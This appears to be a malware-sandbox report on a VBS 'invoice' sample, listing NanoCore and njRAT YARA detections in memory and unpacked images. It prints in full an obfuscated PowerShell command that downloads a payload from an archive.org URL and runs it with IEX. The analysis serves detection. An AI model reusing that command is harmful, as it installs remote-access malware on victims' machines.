      Source: 20.2.aspnet_compiler.exe.3c5399f.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3c47574.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a25794.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2849aac.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3c47574.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a3884f.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2816288.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 20.2.aspnet_compiler.exe.3a25794.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
      Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Wscript starts Powershell (via cmd or directly)Show sources
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 20_2_00D2E480
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 20_2_00D2E471
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 20_2_00D2BBD4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 22_2_01332B48
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 22_2_01330E50
      Source: 3G1J49A6V_Invoice.vbsInitial sample: Strings found which are bigger than 50
      Source: 20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a25794.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a25794.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a3884f.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a3884f.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2816288.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2816288.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 20.2.aspnet_compiler.exe.3a25794.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a25794.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
